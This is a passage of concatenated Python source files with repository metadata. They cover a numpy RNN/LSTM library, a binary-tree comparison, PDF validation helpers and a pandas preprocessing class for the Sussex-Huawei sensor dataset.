numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y))
grid.set_values(rvar, values.transpose())
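# Consistency check (a sketch, not part of the solver): for the Dirichlet case the
# analytical solution u = sin(2*pi*x)*sin(2*pi*y) satisfies laplacian(u) = -8*pi^2*u,
# which is exactly the right-hand side set above. Verified symbolically:
#
#   import sympy
#   x, y = sympy.symbols('x y')
#   u = sympy.sin(2 * sympy.pi * x) * sympy.sin(2 * sympy.pi * y)
#   lap = sympy.diff(u, x, 2) + sympy.diff(u, y, 2)
#   assert sympy.simplify(lap + 8 * sympy.pi**2 * u) == 0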
| 3.3125 | 3 |
python/hello-python.py | bobby-web/programlang | 0 | 12797528 | print("Hello World") | 1.179688 | 1 |
rNet.py | ZigaSajovic/rNet | 11 | 12797529 |
import numpy as np
class tanh:
def __call__(self, input):
return np.tanh(input)
    def d(self, input):
        # derivative expressed in terms of the activation *output*: 1 - tanh(x)^2
        return 1 - input * input
class sigmoid:
def __call__(self, input):
return 1 / (1 + np.exp(-input))
    def d(self, input):
        # derivative in terms of the activation *output* s: s * (1 - s)
        return input * (1 - input)
class identity:
def __call__(self, input):
return input
def d(self, input):
return 1
class mean_square:
def __call__(self, input_1, input_2):
return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True)
def d(self, input_1, input_2):
return (input_1 - input_2) / np.size(input_1)
class softmax:
'''
Only to be used as the last
non-recursive layer
'''
def __call__(self, input):
shifted_ = input - np.max(input)
exp_ = np.exp(shifted_)
return exp_ / np.sum(exp_, axis=1, keepdims=True)
def d(self, probs, train_on=None):
'''
it returns 1,
as the derivative is covered by a
previous call to softmax_loss
function
'''
return 1
class softmax_loss:
'''
To be used in combination with
sofmax
'''
def __call__(self, input, train_on):
return -np.log(input[range(train_on.size), train_on])
def d(self, probs, train_on=None):
'''
it computes the softmax loss derivative
for optimality
'''
tmp_ = np.copy(probs)
tmp_[range(train_on.size), train_on] -= 1
return tmp_
class rNet:
    def __init__(self):
        # per-instance state; a class-level ``layers = []`` would be shared
        # across all rNet instances
        self.layers = []
        self.num_of_layers = lambda: len(self.layers)
def __call__(self, input):
'''
input is to be a rank 3 tensor
'''
out = input
for l in self.layers:
out = l(out)
return out
def init(self):
for l in self.layers:
l.init()
def reset(self):
for l in self.layers:
l.reset()
def add(self, layer_):
self.layers.append(layer_)
def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()):
cache = [None] * self.num_of_layers()
cache_out = [None] * self.num_of_layers()
out = inputs
for l in range(0, self.num_of_layers()):
if cache0 is not None and cache0[l] is not None:
if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None:
out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0'])
elif cache0[l]['h0'] is not None:
out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0'])
else:
out, cache[l] = self.layers[l].eval_for_back_prop(out)
else: out, cache[l] = self.layers[l].eval_for_back_prop(out)
cache_out[l] = {
'c0': cache[l]['cn'] if 'cn' in cache[l] else None,
'h0': cache[l]['hn'] if 'hn' in cache[l] else None}
time_steps, batch, out_ = out.shape
dIn = np.zeros([time_steps, batch, out_])
loss=0
for t in reversed(range(0, time_steps)):
dIn[t] = cost.d(out[t], predictions[t])
loss += np.sum(cost(out[t], predictions[t]), axis=0)
dW = [None] * self.num_of_layers()
for l in reversed(range(0, self.num_of_layers())):
dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None)
return loss, dW, cache_out
def save(self, path):
for i,l in enumerate(self.layers):
np.save('%s_%d.npy'%(path,i),l.weights)
def load(self, path):
for i, l in enumerate(self.layers):
l.weights=np.load('%s_%d.npy' % (path,i))
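
# Hedged usage sketch (layer classes are defined below in this module; shapes
# and sizes are illustrative):
#
#   net = rNet()
#   net.add(LSTM((10, 32)))
#   net.add(FC((32, 4), activation=softmax()))
#   net.init()
#   out = net(np.random.randn(20, 8, 10))   # (time_steps, batch, features)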
class FC:
'''
Fully Connected layer
'''
shape = None
weights = None
activation = None
def reset(self):
pass
def __init__(self, shape, activation=identity()):
self.shape = shape
self.activation = activation
def init(self, scale=1):
self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt(
self.shape[0] + self.shape[1]) * scale
self.weights[-1,] = 0
def __call__(self, input_tensor):
out, _ = self.eval_for_back_prop(input_tensor)
return out
def eval_for_back_prop(self, input_tensor):
time_steps, batch, in_ = input_tensor.shape
inputs = np.zeros([time_steps, batch, self.shape[0] + 1])
outputs = np.zeros([time_steps, batch, self.shape[1]])
raws = np.zeros([time_steps, batch, self.shape[1]])
for t in range(0, time_steps):
inputs[t, :, 0:-1] = input_tensor[t, :, :]
inputs[t, :, -1] = 1
raws[t] = inputs[t].dot(self.weights)
outputs[t] = self.activation(raws[t])
return outputs, {'inputs': inputs,
'raws': raws,
'outputs': outputs}
def time_grad(self, dOut, cache, dCache=None):
inputs = cache['inputs']
outputs = cache['outputs']
time_steps, batch, in_ = inputs.shape
dIn = np.zeros([time_steps, batch, self.shape[0]])
dW = np.zeros_like(self.weights)
for t in reversed(range(0, time_steps)):
dAct = dOut[t] * self.activation.d(outputs[t])
            '''
            the following line sums the gradients over the entire batch
            proof:
                Let x be a single input and dY a single gradient
                Then
                    dW = np.outer(x, dY) = x.T * dY  -> * stands for the dot product
                Now, we have an (x_i) matrix and a (dY_i) matrix
                    dW_i = x_i.T * dY_i
                Our desired result is
                    dW = dW_1 + ... + dW_n
                Thus
                    dW = x_1.T * dY_1 + ... + x_n.T * dY_n
                which is precisely the matrix product
                    dW = x.T * dY
                where x holds the x_i as its rows and dY holds the dY_i as its rows.
                In other words, a product of two matrices is a sum
                of tensor products of the columns and rows of the respective matrices.
            '''
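            # Tiny numeric check of the identity above (illustrative shapes):
            #   x  = np.random.randn(4, 3); dY = np.random.randn(4, 2)
            #   ref = sum(np.outer(x[i], dY[i]) for i in range(4))
            #   assert np.allclose(x.T.dot(dY), ref)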
dW += np.dot(inputs[t].T, dAct)
dIn[t] = dAct.dot(self.weights.T)[:, 0:-1]
return dW, dIn, None
class FCr:
'''
Fully Connected recursive layer
'''
shape = None
weights = None
previous = None
activation = None
def __init__(self, shape, activation=identity()):
self.shape = shape
self.activation = activation
def init(self, scale=1):
self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt(
self.shape[0] + self.shape[1]) * scale
self.weights[-1, :] = 0
def reset(self):
self.previous = None
def __call__(self, input_tensor):
out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous)
self.previous = np.copy(cache['hn'])
return out
def eval_for_back_prop(self, input_tensor, h0=None):
time_steps, batch, in_ = input_tensor.shape
inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1])
raws = np.zeros([time_steps, batch, self.shape[1]])
outputs = np.zeros([time_steps, batch, self.shape[1]])
if h0 is None: h0 = np.zeros([batch, self.shape[1]])
for t in range(0, time_steps):
previous = outputs[t - 1] if t > 0 else h0
inputs[t, :, -1] = 1
inputs[t, :, 0:self.shape[0]] = input_tensor[t]
inputs[t, :, self.shape[0]:-1] = previous
raws[t] = inputs[t].dot(self.weights)
outputs[t] = self.activation(raws[t])
return outputs, {'inputs': inputs,
'raws': raws,
'outputs': outputs,
'h0': h0,
'hn': outputs[-1]}
def time_grad(self, dOut, cache, dCache=None):
inputs = cache['inputs']
outputs = cache['outputs']
time_steps, batch, out_ = outputs.shape
dW = np.zeros(self.weights.shape)
dInput = np.zeros(inputs.shape)
dIn = np.zeros([time_steps, batch, self.shape[0]])
dh0 = np.zeros([batch, self.shape[1]])
dH = dOut.copy()
        if dCache is not None:
            # carry over the hidden-state gradient from the next chunk
            # (was dH['dHidden'], which indexes an ndarray with a string)
            dH[-1] += np.copy(dCache['dHidden'])
for t in reversed(range(0, len(dOut))):
dAct = dH[t] * self.activation.d(outputs[t])
            '''
            the following line sums the gradients over the entire batch;
            see the proof in FC.time_grad above (dW = x.T * dY equals the sum of
            per-sample outer products).
            '''
dW += np.dot(inputs[t].T, dAct)
dInput[t] = dAct.dot(self.weights.T)
dIn[t] = dInput[t, :, 0:self.shape[0]]
dh = dH[t - 1] if t > 0 else dh0
dh += dInput[t, :, self.shape[0]:-1]
return dW, dIn, {'dHidden': dh0}
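
# Hedged finite-difference gradient check for a layer (a sketch; eps, the weight
# index and all shapes are illustrative):
#
#   layer = FCr((3, 5), activation=tanh()); layer.init()
#   x = np.random.randn(4, 2, 3)                    # (time, batch, features)
#   out, cache = layer.eval_for_back_prop(x)
#   dW, _, _ = layer.time_grad(np.ones_like(out), cache)
#   eps, i, j = 1e-5, 0, 0
#   layer.weights[i, j] += eps; out_p = layer.eval_for_back_prop(x)[0].sum()
#   layer.weights[i, j] -= 2 * eps; out_m = layer.eval_for_back_prop(x)[0].sum()
#   layer.weights[i, j] += eps
#   assert abs((out_p - out_m) / (2 * eps) - dW[i, j]) < 1e-4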
class LSTM:
'''
Long Short Term Memory layer
Paper can be found at:
http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf
'''
shape = None
weights = None
previous = None
cell = None
def __init__(self, shape):
self.shape = shape
def init(self, forget_bias_init=3):
'''
forget bias initialization as seen in the paper
http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf
section 2.2
'''
self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt(
self.shape[0] + self.shape[1])
self.weights[-1, :] = 0
if forget_bias_init != 0:
self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init
self.previous = None
self.cell = None
def reset(self):
self.previous = None
self.cell = None
def __call__(self, input_tensor):
outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous)
self.cell = np.copy(cache['cn'])
self.previous = np.copy(cache['hn'])
return outputs
def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0):
time_steps, batch, in_ = input.shape
inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1])
outputs = np.zeros([time_steps, batch, self.shape[1]])
cells = np.zeros([time_steps, batch, self.shape[1]])
cells_act = np.zeros([time_steps, batch, self.shape[1]])
activations = np.zeros([time_steps, batch, 4 * self.shape[1]])
if c0 is None: c0 = np.zeros([batch, self.shape[1]])
if h0 is None: h0 = np.zeros([batch, self.shape[1]])
for t in range(0, time_steps):
previous = outputs[t - 1] if t > 0 else h0
previous_cell = cells[t - 1] if t > 0 else c0
inputs[t, :, -1] = 1
inputs[t, :, 0:self.shape[0]] = input[t]
inputs[t, :, self.shape[0]:-1] = previous
raws_ = inputs[t].dot(self.weights[mask_start:, ])
activations[t, :, 0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]]))
activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:])
cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \
activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:]
cells_act[t] = np.tanh(cells[t])
outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t]
return outputs, {'inputs': inputs,
'outputs': outputs,
'activations': activations,
'cells': cells,
'cells_act': cells_act,
'h0': h0,
'c0': c0,
'hn': outputs[-1],
'cn': cells[-1]}
def time_grad(self, next_grad, cache, dCache=None, mask_start=0):
inputs = cache['inputs']
outputs = cache['outputs']
activations = cache['activations']
cell_act = cache['cells_act']
cell = cache['cells']
c0 = cache['c0']
time_steps, batch, out_ = outputs.shape
dAct = np.zeros(activations.shape)
dW = np.zeros(self.weights.shape)
dInput = np.zeros(inputs.shape)
dCell = np.zeros(cell.shape)
dIn = np.zeros([time_steps, batch, self.shape[0]])
dh0 = np.zeros([batch, self.shape[1]])
dc0 = np.zeros([batch, self.shape[1]])
dH = next_grad.copy()
if dCache is not None:
dCell[-1] += dCache['dCell']
dH[-1] += dCache['dHidden']
for t in reversed(range(0, time_steps)):
dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t]
# dout
dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t]
C_previous, dC_previous = (cell[t - 1], dCell[t - 1]) if t > 0 else (c0, dc0)
# dforget
dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t]
dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t]
# dwrite_i
dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t]
# dwrite_c
dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t]
# activations
dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :,
0:3 * self.shape[1]]
dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2)
            '''
            the following line sums the gradients over the entire batch;
            see the proof in FC.time_grad above (dW = x.T * dY equals the sum of
            per-sample outer products).
            '''
dW += np.dot(inputs[t].T, dAct[t])
dInput[t] = dAct[t].dot(self.weights.T)
dIn[t] = dInput[t, :, 0:self.shape[0]]
dh = dH[t - 1] if t > 0 else dh0
dh += dInput[t, :, self.shape[0]:-1]
return dW, dIn, {'dHidden': dh0,
'dCell': dc0} | 2.921875 | 3 |
Tree/identicalTree.py | jainanisha90/codepath_interviewBit | 0 | 12797530 | # Definition for a binary tree node
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
# @param A : root node of tree
# @param B : root node of tree
# @return an integer
def isSameTree(self, A, B):
if A is None and B is None:
            return 1
if A is not None and B is not None:
if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right):
return 1
return 0
if __name__ == "__main__":
root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3)
root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3)
print Solution().isSameTree(root1, root2) # Output 1
| 3.96875 | 4 |
mapperpy/exceptions.py | cohirer2019/MapperPy | 2 | 12797531 |
__author__ = 'lgrech'
class ConfigurationException(Exception):
pass
| 1.34375 | 1 |
app/imr/scrapyard.py | DarkMaguz/IMR-ReportGenerator | 0 | 12797532 |
import os

import magic  # python-magic; needed by the validatePDF helpers below
import pikepdf
import PyPDF2

# NOTE: the validatePDF_test* helpers below also expect a module-level
# ``downloadDir`` path to be defined elsewhere.
# excelFileList = getExcelFiles()
# print(getURLsFromExcelFile(excelFileList[0]))
# info = downloadFile(
# "http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf")
#
# dlReports = [info]
def validatePDF(filePath):
#print('validatePDF: ', filePath)
return magic.from_file(filePath, mime=True)
# try:
# output = magic.from_file(filePath, mime=True).lower()
# if "pdf" not in output:
# return False
# except Exception as e:
# return False
# else:
# return True
def validatePDF_test2(fileName):
isOK = ""
checkData = []
filePath = os.path.join(downloadDir, fileName)
try:
pdfFile = pikepdf.open(filePath)
#meta = pdfFile.open_metadata()
#checkData.append(meta.pdfa_status)
#checkData.append(meta['xmp:CreatorTool'])
#checkData.append(pdfFile.check())
#checkData.append(len(pdfFile.pages))
#print(pdfFile.pages)
#if pdfFile.pages <= 0:
# raise "k"
#print(meta.pdfa_status)
except Exception as e:
isOK = "False"
else:
isOK = "True"
return [isOK, checkData]
def validatePDF_test1(fileName):
isOK = ['', '']
checkData = []
filePath = os.path.join(downloadDir, fileName)
try:
pdfFile = pikepdf.open(filePath)
#meta = pdfFile.open_metadata()
#status = meta.pdfa_status
#checkData = pdfFile.check()
checkData.append(len(pdfFile.pages))
#checkData = [check, meta, status]
#print(pdfFile.pages)
if len(pdfFile.pages) <= 0:
raise "k"
#print(meta.pdfa_status)
except Exception as e:
isOK[0] = 'NO'
else:
isOK[0] = 'YES'
try:
with open(filePath, 'rb') as pdfFileObj:
pdfReader = PyPDF2.PdfFileReader(pdfFileObj)
if pdfReader.numPages <= 0:
raise "k"
except Exception as e:
isOK[1] = 'NO'
else:
isOK[1] = 'YES'
#print('%s:\n %s %s' % (fileName, isOK[0], isOK[1]))
#print('%s %s' % (isOK[0], isOK[1]))
return [isOK, checkData]
# if __name__ == '__main__':
# downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf')
# #header = b'HTTP/1.1 200 OK\r\nDate: Sun, 28 Nov 2021 12:45:04 GMT\r\nServer: Apache\r\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 5092104\r\nX-Content-Type-Options: nosniff\r\nConnection: close\r\nContent-Type: application/pdf\r\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\r\nX-Frame-Options: SAMEORIGIN\r\nX-XSS-Protection: 1; mode=block\r\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\r\n\r\n'
# #print(header.decode('iso-8859-1'))
# for name, value in headers.items():
# print('%s: %s' % (name, value))
| 2.578125 | 3 |
pipeline/feature_engineering/preprocessing/sussex_huawei_preprocessor.py | lorenz0890/road_condition_classification | 0 | 12797533 | from pipeline.feature_engineering.preprocessing.abstract_preprocessor import Preprocessor
from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy
from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy
from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy
from overrides import overrides
import traceback
import os
import pandas
from sklearn.decomposition import PCA
import numpy
class SussexHuaweiPreprocessor(Preprocessor):
def __init__(self):
super().__init__()
@overrides
def segment_data(self, data, mode, label_column=None, args=None):
"""
        Segments a time series based on a label column, by semantic segmentation, or into fixed-length intervals.
:param data:
:param mode:
:param label_column:
:param args:
:return:
"""
try:
if data is None or mode is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if mode == 'semantic':
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
if mode == 'labels':
# 1. Select all data with desired label value
data_segments = []
for target_label in args:
selected_data = data[data[label_column] == target_label]
# 2. Split by non-subsequent indices
# Source for next 3 lines after comment:
# https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index
non_sequence = pandas.Series(selected_data.index).diff() != 1
grouper = non_sequence.cumsum().values
selected_data_segments = [group for _, group in selected_data.groupby(grouper)]
for segment in selected_data_segments:
data_segments.append(segment)
return data_segments
if mode == 'fixed_interval':
segment_length = args[0]
aggregate = args[1]
exact_length = args[2]
segments_aggregated = []
split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0)
# 1. Ensure index is datetime index and standardize type
data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]'))
#2. Segment data
segments = split(data, segment_length)
if not exact_length:
for segment in segments:
segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))
return segments
#3. Remove segments that are too long or too short after splitting
min_length_subsegements = []
for segment in segments:
if segment.shape[0] == segment_length:
min_length_subsegements.append(segment)
if not aggregate:
for segment in min_length_subsegements:
segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))
return min_length_subsegements
#3. Resample and aggregate data
segments_combined = None
for segment in min_length_subsegements:
segment = segment.reset_index()
segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]'))
segment = self.resample_quantitative_data(segment,
freq="{}s".format(segment_length),
mode = 'mean')
if segments_combined is None:
segments_combined = segment
else:
segments_combined = pandas.concat([segments_combined, segment], axis=0)
if segments_combined is not None:
segments_combined = segments_combined.reset_index()
segments_combined.index = pandas.DatetimeIndex(
segments_combined.index.astype('datetime64[1s]'))
segments_aggregated.append(segments_combined)
return segments_aggregated
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
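    # Usage sketch (hypothetical DataFrame `df`): segmenting by label values
    # returns one DataFrame per contiguous run of each requested label, e.g.
    #
    #   pre = SussexHuaweiPreprocessor()
    #   segments = pre.segment_data(df, mode='labels',
    #                               label_column='coarse_label', args=[5])
    #   # every element of `segments` is a contiguous block with coarse_label == 5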
@overrides
def de_segment_data(self, data_segments, selected_columns=None, axis = 0):
"""
        De-segments a time series by concatenating the given segments back together.
:param data_segments:
:param selected_columns:
:param axis:
:return:
"""
try:
data = None
for ind in range(len(data_segments)):
if data is None:
data = data_segments[ind][selected_columns]
else:
data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis)
data = data.reset_index(drop=True)
return data
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def remove_nans(self, data, replacement_mode, replacement_value=None):
"""
Remove NaNs
:param data:
        :param replacement_mode: string, 'mean', 'replacement_val' or 'del_row'
        :param replacement_value: any type, used as value if replacement_mode is 'replacement_val'
:return: pandas.DataFrame
"""
try:
if data is None or replacement_mode is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if replacement_mode == 'mean':
return MeanReplacementStrategy().replace(data, 'NaN')
if replacement_mode == 'del_row':
return DelRowReplacementStrategy().replace(data, 'NaN')
if replacement_mode == 'replacement_val':
return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value)
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None):
"""
        Removes outliers based either on a quantile or on a threshold value.
:param data:
:param replacement_mode:
:param columns:
:param quantile:
:param threshold:
:return:
"""
try:
if data is None or replacement_mode is None or columns is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if len(columns) < 1:
raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)
if replacement_mode == 'quantile':
# Source for next 7 lines of code after comment:
# https://nextjournal.com/schmudde/how-to-remove-outliers-in-data
for column in columns:
not_outliers = data[column].between(
data[column].quantile(1.0 - quantile),
data[column].quantile(quantile)
)
data[column] = data[column][not_outliers]
index_names = data[~not_outliers].index
data.drop(index_names, inplace=True)
old_index = data.index
data = data.reset_index(drop=False)
data = data.set_index(old_index)
return data
if replacement_mode == 'threshold':
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def resample_quantitative_data(self, data, freq, mode = None):
"""
Resamples quantitative data.
:param data:
:param freq:
:param mode:
:return:
"""
# Source:
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html
# https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html
try:
if data is None or freq is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if mode == 'mean' or mode is None:
return data.resample(freq).mean()
            if mode == 'sum':
                return data.resample(freq).sum()
            raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def convert_unix_to_datetime(self, data, column, unit):
"""
Converts unix time stamps to date time.
:param data:
:param column:
:param unit:
:return:
"""
# Source:
# https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe
# https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime
try:
if data is None or column is None or unit is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
data[column] = pandas.to_datetime(data[column], unit=unit)
return data
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode):
"""
Remove rows that have an unwanted label.
:param data:
:param unwanted_labels:
:param replacement_mode:
:return:
"""
try:
if data is None or replacement_mode is None or unwanted_labels is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if replacement_mode == 'del_row':
return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels)
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None):
"""
Project accelerometer data from local vehicle coordinates to a global coordinate system.
:param data:
:param target_columns:
:param mode:
:param args:
:return:
"""
try:
if data is None or target_columns is None or mode is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list):
                raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if mode == 'mean_estimate_gravity':
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
if mode == 'gyroscope':
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
if mode == 'gravity':
if len(target_columns) != len(args):
raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value)
for ind, column in enumerate(target_columns):
data[column] = data[column] - data[args[ind]]
return data
if mode == 'orientation':
if len(target_columns)+1 != len(args):
raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value)
# Source for theory behind below calculation
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation
# https://en.wikipedia.org/wiki/Homogeneous_coordinates
# #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it
for ind, column in enumerate(target_columns):
data[column] = data[column] * (data[args[ind]] / data[args[3]])
return data
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def label_data(self, labels, data):
"""
Combines labels vector and data matrix.
:param labels:
:param data:
:return:
"""
try:
if data is None or labels is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if (len(labels) != len(data)):
raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value)
return pandas.concat((labels, data), axis=1)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def znormalize_quantitative_data(self, data, columns = None, mean = None, std = None):
"""
Apply z-normalization to a data set.
:param data:
:param columns:
:param mean:
:param std:
:return:
"""
try:
if data is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
            if columns is not None and not all(column in data.keys() for column in columns):
raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)
if mean is None and std is None:
if columns is not None:
mean = data[columns].mean()
std = data[columns].std()
data[columns] = (data[columns] - data[columns].mean()) / data[columns].std()
else:
mean = data.mean()
std = data.std()
data = (data - data.mean()) / data.std()
elif mean is not None and std is not None:
if columns is not None:
data[columns] = (data[columns] - mean) / std
else:
data = (data - mean) / std
else:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
return data, mean, std
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def min_max_normalize_quantitative_data(self, data, columns=None):
"""
Apply min-max-normalization to a data set.
:param data:
:param columns:
:return:
"""
try:
if data is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
            if columns is not None and not all(column in data.keys() for column in columns):
                raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)
            if columns is not None:
